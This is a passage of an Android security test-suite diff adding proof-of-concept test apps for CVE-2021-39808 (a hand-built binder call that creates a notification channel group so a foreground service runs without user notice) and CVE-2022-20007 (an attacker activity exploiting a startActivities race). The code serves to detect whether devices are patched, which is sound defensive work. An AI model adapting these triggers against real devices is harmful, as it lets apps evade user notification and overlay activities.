+ if (isSecondPatchAbsent) {
+ // Fail the test as Latest Fix Patch is not applied
+ fail(resources.getString(R.string.secondFixFailure));
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ outputStream.close();
+ } catch (Exception e) {
+ // ignore all exceptions
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/Android.bp
new file mode 100644
index 00000000000..13a86e3b68e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2021-39808",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/AndroidManifest.xml
new file mode 100644
index 00000000000..0394d6ccb6a
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/AndroidManifest.xml
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2021_39808">
+ <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
+ <application>
+ <service
+ android:name=".PocService"
+ android:exported="true">
+ </service>
+ </application>
+
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_39808" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/integers.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/integers.xml
new file mode 100644
index 00000000000..8e7d104c6d2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/integers.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<resources>
+ <integer name="assumptionFailure">4</integer>
+ <integer name="fail">2</integer>
+ <integer name="falseVal">-1</integer>
+ <integer name="height">50</integer>
+ <integer name="pass">3</integer>
+ <integer name="setFlag">1</integer>
+ <integer name="timeoutMs">10000</integer>
+ <integer name="value">0</integer>
+ <integer name="width">50</integer>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/strings.xml
new file mode 100644
index 00000000000..f4fb7413e40
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/strings.xml
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<resources>
+ <string name="assumptionFailure">Assumption failure occurred</string>
+ <string name="errorNoMethodFound">No method found</string>
+ <string name="errorTargetMethodNotFound">Target method not found</string>
+ <string name="flag">flag</string>
+ <string name="functionName">createNotificationChannelGroups</string>
+ <string name="group">group</string>
+ <string name="groupId">groupId</string>
+ <string name="illegalCode">Illegal Code</string>
+ <string name="messageKey">MESSAGE</string>
+ <string name="resultKey">RESULT</string>
+ <string name="message">message</string>
+ <string name="notification">notification</string>
+ <string name="passMessage">Passed</string>
+ <string name="sharedPreference">CVE_2021_39808</string>
+ <string name="vulnerableMessage">
+ Vulnerable to b/209966086!! Foreground service ran without user notification
+ </string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/DeviceTest.java
new file mode 100644
index 00000000000..a32638dda2c
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/DeviceTest.java
@@ -0,0 +1,82 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39808;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static org.junit.Assert.assertNotEquals;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.content.Context;
+import android.content.Intent;
+import android.content.SharedPreferences;
+import android.content.SharedPreferences.OnSharedPreferenceChangeListener;
+import android.content.res.Resources;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testService() {
+ try {
+ Context context = getApplicationContext();
+ Intent intent = new Intent(context, PocService.class);
+ intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ context.startService(intent);
+ SharedPreferences sh = context.getSharedPreferences(
+ context.getString(R.string.sharedPreference),
+ Context.MODE_APPEND);
+ final Semaphore preferenceChanged = new Semaphore(0);
+ OnSharedPreferenceChangeListener listener = new OnSharedPreferenceChangeListener() {
+ @Override
+ public void onSharedPreferenceChanged(
+ SharedPreferences sharedPreferences, String key) {
+ if (key.equals(context.getString(R.string.resultKey))) {
+ if (sharedPreferences.getInt(key, 0) == context
+ .getResources().getInteger(R.integer.pass)) {
+ preferenceChanged.release();
+ }
+ }
+ }
+ };
+ sh.registerOnSharedPreferenceChangeListener(listener);
+
+ preferenceChanged.tryAcquire(
+ context.getResources().getInteger(R.integer.timeoutMs),
+ TimeUnit.MILLISECONDS);
+
+ int result = sh.getInt(context.getString(R.string.resultKey),
+ context.getResources().getInteger(R.integer.pass));
+ String message = sh.getString(context.getString(R.string.messageKey),
+ context.getString(R.string.passMessage));
+ assumeTrue(message, result != context.getResources()
+ .getInteger(R.integer.assumptionFailure));
+ assertNotEquals(message, result,
+ context.getResources().getInteger(R.integer.fail));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/PocService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/PocService.java
new file mode 100644
index 00000000000..73b0df4adfb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/PocService.java
@@ -0,0 +1,137 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39808;
+
+import android.app.INotificationManager;
+import android.app.NotificationChannelGroup;
+import android.app.NotificationManager;
+import android.app.Service;
+import android.content.Context;
+import android.content.Intent;
+import android.content.SharedPreferences;
+import android.os.IBinder;
+import android.os.Parcel;
+import android.os.ServiceManager;
+import android.text.TextUtils;
+
+import java.lang.reflect.Method;
+
+public class PocService extends Service {
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return null;
+ }
+
+ @Override
+ public void onCreate() {
+ try {
+ super.onCreate();
+ setResult(getResources().getInteger(R.integer.fail),
+ getResources().getString(R.string.vulnerableMessage));
+ createNotificationGroup();
+ } catch (Exception e) {
+ setResult(getResources().getInteger(R.integer.assumptionFailure),
+ e.getMessage());
+ }
+ }
+
+ void createNotificationGroup() throws Exception {
+ IBinder binder = ServiceManager
+ .getService(getResources().getString(R.string.notification));
+ int serviceId = getTransactionCode(
+ getResources().getString(R.string.functionName));
+ if (serviceId == -1) {
+ setResult(getResources().getInteger(R.integer.assumptionFailure),
+ getString(R.string.errorNoMethodFound));
+ return;
+ } else if (serviceId == -2) {
+ setResult(getResources().getInteger(R.integer.assumptionFailure),
+ getString(R.string.errorTargetMethodNotFound));
+ return;
+ }
+ createNotificationGroup(binder, serviceId);
+ NotificationManager notificationManager = (NotificationManager) getSystemService(
+ NOTIFICATION_SERVICE);
+ NotificationChannelGroup notificationChannelGroup = notificationManager
+ .getNotificationChannelGroup(
+ getResources().getString(R.string.groupId));
+ if (!notificationChannelGroup.isBlocked()) {
+ setResult(getResources().getInteger(R.integer.pass),
+ getResources().getString(R.string.passMessage));
+ }
+ }
+
+ int getTransactionCode(String methodName) {
+ int txCode = IBinder.FIRST_CALL_TRANSACTION;
+ String txName = INotificationManager.Stub
+ .getDefaultTransactionName(txCode);
+ if (txName == null) {
+ return -1;
+ }
+ while (txName != null && txCode <= IBinder.LAST_CALL_TRANSACTION) {
+ txName = INotificationManager.Stub
+ .getDefaultTransactionName(++txCode);
+ if (txName.equals(methodName)) {
+ break;
+ }
+ }
+ if (txName == null) {
+ return -2;
+ }
+ return txCode;
+ }
+
+ void createNotificationGroup(IBinder binder, int code) throws Exception {
+ String description = binder.getInterfaceDescriptor();
+ Parcel data = Parcel.obtain();
+ Parcel reply = Parcel.obtain();
+ data.writeInterfaceToken(description);
+ data.writeString(this.getPackageName());
+ data.writeInt(getResources().getInteger(R.integer.setFlag));
+ data.writeInt(getResources().getInteger(R.integer.setFlag));
+ data.writeString(NotificationChannelGroup.class.getName());
+ data.writeInt(getResources().getInteger(R.integer.setFlag));
+ data.writeByte((byte) getResources().getInteger(R.integer.setFlag));
+ data.writeString(getResources().getString(R.string.groupId));
+ TextUtils.writeToParcel(getResources().getString(R.string.group), data,
+ getResources().getInteger(R.integer.setFlag));
+ data.writeByte((byte) getResources().getInteger(R.integer.value));
+ data.writeInt(getResources().getInteger(R.integer.falseVal));
+ data.writeInt(getResources().getInteger(R.integer.setFlag));
+ boolean val = (boolean) binder.transact(code, data, reply,
+ getResources().getInteger(R.integer.value));
+ if (!val) {
+ setResult(getResources().getInteger(R.integer.assumptionFailure),
+ getResources().getString(R.string.illegalCode));
+ }
+ reply.readException();
+ }
+
+ private void setResult(int result, String message) {
+ try {
+ SharedPreferences sh = getSharedPreferences(
+ getString(R.string.sharedPreference), Context.MODE_PRIVATE);
+ SharedPreferences.Editor edit = sh.edit();
+ edit.putInt(getString(R.string.resultKey), result);
+ edit.putString(getString(R.string.messageKey), message);
+ edit.commit();
+ } catch (Exception e) {
+ // ignore exception
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/attacker-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/attacker-app/AndroidManifest.xml
index 9f7ac842f5b..731eac43717 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/attacker-app/AndroidManifest.xml
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/attacker-app/AndroidManifest.xml
@@ -23,7 +23,7 @@
android:label="CVE-2022-20007-Attacker"
android:supportsRtl="true">
<activity
- android:name=".PocActivity"
+ android:name=".PocAttackerActivity"
android:exported="true"
android:theme="@android:style/Theme.Translucent.NoTitleBar.Fullscreen">
</activity>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/attacker-app/src/android/security/cts/CVE_2022_20007_attacker/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/attacker-app/src/android/security/cts/CVE_2022_20007_attacker/PocAttackerActivity.java
index ad87ea7434f..988517e8670 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/attacker-app/src/android/security/cts/CVE_2022_20007_attacker/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/attacker-app/src/android/security/cts/CVE_2022_20007_attacker/PocAttackerActivity.java
@@ -20,7 +20,7 @@ import android.app.Activity;
import android.os.Bundle;
import android.view.WindowManager;
-public class PocActivity extends Activity {
+public class PocAttackerActivity extends Activity {
@Override
protected void onCreate(Bundle savedInstanceState) {
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/Android.bp
new file mode 100644
index 00000000000..98d59623a28
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/Android.bp
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2022-20007-Second",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/AndroidManifest.xml
new file mode 100644
index 00000000000..7880b0f0669
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/AndroidManifest.xml
@@ -0,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2022_20007_second"
+ android:sharedUserId="android.security.cts.CVE_2022_20007_shared_uid"
+ android:versionCode="1"
+ android:versionName="1.0">
+ <application
+ android:label="CVE-2022-20007-Second"
+ android:process="android.security.cts.CVE_2022_20007"
+ android:supportsRtl="true">
+ <activity
+ android:name=".SecondPocActivity"
+ android:exported="true">
+ </activity>
+ </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/res/layout/activity_main.xml
new file mode 100644
index 00000000000..d327e30f622
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/res/layout/activity_main.xml
@@ -0,0 +1,25 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<LinearLayout
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent">
+ <View
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"/>
+</LinearLayout>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/res/values/integers.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/res/values/integers.xml
new file mode 100644
index 00000000000..e112bcd4ab2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/res/values/integers.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <integer name="fail">1</integer>
+ <integer name="pass">0</integer>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/res/values/strings.xml
new file mode 100644
index 00000000000..c20d81ccfa0
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/res/values/strings.xml
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="resultKey2">result2</string>
+ <string name="sharedPreferences">SharedPreferences</string>
+ <string name="testAppPackage">android.security.cts.CVE_2022_20007</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/src/android/security/cts/CVE_2022_20007_second/SecondPocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/src/android/security/cts/CVE_2022_20007_second/SecondPocActivity.java
new file mode 100644
index 00000000000..867da1c4ce2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/src/android/security/cts/CVE_2022_20007_second/SecondPocActivity.java
@@ -0,0 +1,57 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20007_second;
+
+import android.app.Activity;
+import android.content.Context;
+import android.content.SharedPreferences;
+import android.os.Bundle;
+
+public class SecondPocActivity extends Activity {
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ setContentView(R.layout.activity_main);
+ }
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+ setSharedPreferenes(getResources().getInteger(R.integer.fail));
+ }
+
+ @Override
+ protected void onPause() {
+ super.onPause();
+ setSharedPreferenes(getResources().getInteger(R.integer.pass));
+ }
+
+ void setSharedPreferenes(int result) {
+ try {
+ Context testAppContext = createPackageContext(getString(R.string.testAppPackage),
+ Context.CONTEXT_IGNORE_SECURITY);
+ SharedPreferences sh = testAppContext.getSharedPreferences(
+ getString(R.string.sharedPreferences), Context.MODE_PRIVATE);
+ SharedPreferences.Editor edit = sh.edit();
+ edit.putInt(getString(R.string.resultKey2), result);
+ edit.commit();
+ } catch (Exception e) {
+ // ignore exception here
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/Android.bp
index 713c0ed6500..0633c692d2a 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/Android.bp
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/Android.bp
@@ -32,6 +32,7 @@ android_test_helper_app {
static_libs: [
"androidx.test.core",
"androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
],
sdk_version: "current",
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/AndroidManifest.xml
index ea78d62cdb1..c5dd6b5e9ac 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/AndroidManifest.xml
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/AndroidManifest.xml
@@ -17,13 +17,15 @@
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="android.security.cts.CVE_2022_20007"
+ android:sharedUserId="android.security.cts.CVE_2022_20007_shared_uid"
android:versionCode="1"
android:versionName="1.0">
<application
android:label="CVE-2022-20007"
+ android:process="android.security.cts.CVE_2022_20007"
android:supportsRtl="true">
<activity
- android:name=".PocActivity"
+ android:name=".FirstPocActivity"
android:exported="true">
</activity>
<activity
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/res/values/integers.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/res/values/integers.xml
index 26b15c29414..bdb37757898 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/res/values/integers.xml
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/res/values/integers.xml
@@ -17,6 +17,9 @@
<resources>
<integer name="assumptionFailure">-1</integer>
- <integer name="pass">0</integer>
<integer name="fail">1</integer>
+ <integer name="pass">0</integer>
+ <integer name="permitCount">2</integer>
+ <integer name="threeActivities">3</integer>
+ <integer name="twoActivities">2</integer>
</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/res/values/strings.xml
index 1368bc206a9..e9910b70037 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/res/values/strings.xml
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/res/values/strings.xml
@@ -17,14 +17,22 @@
<resources>
<string name="assumptionFailureMessage">
- Assumption failure occurred.
+ Assumption failure occurred. Bounds :
</string>
+ <string name="attackerActivity">PocAttackerActivity</string>
+ <string name="attackerPkg">android.security.cts.CVE_2022_20007_attacker</string>
+ <string name="boundsNotEqualMessage">Activity bounds are not equal</string>
+ <string name="dumpsysCmd">dumpsys activity %1$s</string>
<string name="failMessage">
Vulnerable to b/211481342!! Race Condition when startActivities() is invoked which can cause
- Not-Paused Background Activity
+ Not-Paused Background Activity. Bounds :
</string>
+ <string name="mBounds">mBounds</string>
<string name="messageKey">message</string>
- <string name="passMessage">Pass</string>
+ <string name="numActivities">numActivities</string>
<string name="resultKey">result</string>
+ <string name="resultKey2">result2</string>
+ <string name="secondActivity">SecondPocActivity</string>
+ <string name="secondPocAppPkg">android.security.cts.CVE_2022_20007_second</string>
<string name="sharedPreferences">SharedPreferences</string>
</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/DeviceTest.java
index 925da1ce80b..d4828b868b5 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/DeviceTest.java
@@ -17,18 +17,22 @@
package android.security.cts.CVE_2022_20007;
import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
-import static org.junit.Assert.assertNotEquals;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+import static org.junit.Assert.assertFalse;
import static org.junit.Assume.assumeNoException;
import static org.junit.Assume.assumeNotNull;
import static org.junit.Assume.assumeTrue;
-import android.content.ActivityNotFoundException;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import android.content.SharedPreferences.OnSharedPreferenceChangeListener;
+import android.util.Log;
import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.Until;
import org.junit.Test;
import org.junit.runner.RunWith;
@@ -39,6 +43,13 @@ import java.util.concurrent.TimeUnit;
@RunWith(AndroidJUnit4.class)
public class DeviceTest {
private Context mContext = getApplicationContext();
+ private UiDevice mDevice = UiDevice.getInstance(getInstrumentation());
+ private boolean mIsVulnerable = true;
+ private boolean mIsVulnerable2 = true;
+ private String mFirstPocActivityBounds = "";
+ private String mSecondPocActivityBounds = "";
+ private String mPocAttackerActivityBounds = "";
+ private SharedPreferences mSharedPrefs = null;
String getStringRes(int key) {
return mContext != null ? mContext.getResources().getString(key) : null;
@@ -48,44 +59,115 @@ public class DeviceTest {
return mContext != null ? mContext.getResources().getInteger(key) : null;
}
- @Test
- public void testRaceCondition() throws Exception {
- final long timeoutSec = 20L;
- assumeNotNull(mContext);
+ String getBounds(String activityName) throws Exception {
+ String output =
+ mDevice.executeShellCommand(mContext.getString(R.string.dumpsysCmd, activityName));
+ output = output.substring(output.indexOf(getStringRes(R.string.mBounds)),
+ output.indexOf(")", output.indexOf(getStringRes(R.string.mBounds))) + 1);
+ return output;
+ }
+
+ void launchMainActivity(int numActivities) {
final Intent intent = new Intent(mContext, PocMainActivity.class);
- intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_NO_HISTORY);
+ intent.putExtra(getStringRes(R.string.numActivities), numActivities);
+ mContext.startActivity(intent);
+ }
+
+ void checkResult(String key) {
+ int result = mSharedPrefs.getInt(key, getIntegerRes(R.integer.assumptionFailure));
+ assumeTrue(
+ getStringRes(R.string.assumptionFailureMessage) + mFirstPocActivityBounds + " "
+ + mSecondPocActivityBounds + " " + mPocAttackerActivityBounds,
+ result != getIntegerRes(R.integer.assumptionFailure));
+ assertFalse(
+ getStringRes(R.string.failMessage) + mFirstPocActivityBounds + " "
+ + mSecondPocActivityBounds + " " + mPocAttackerActivityBounds,
+ mIsVulnerable && result == getIntegerRes(R.integer.fail));
+ }
+
+ @Test
+ public void testRaceCondition() {
+ final long timeoutSec = 30L;
try {
- mContext.startActivity(intent);
- } catch (ActivityNotFoundException e) {
- assumeNoException(e);
- }
- SharedPreferences sharedPrefs = mContext.getSharedPreferences(
- getStringRes(R.string.sharedPreferences), Context.MODE_APPEND);
- assumeNotNull(sharedPrefs);
- final Semaphore preferenceChanged = new Semaphore(0);
- OnSharedPreferenceChangeListener listener = new OnSharedPreferenceChangeListener() {
- @Override
- public void onSharedPreferenceChanged(SharedPreferences sharedPreferences, String key) {
- if (key.equals(getStringRes(R.string.resultKey))) {
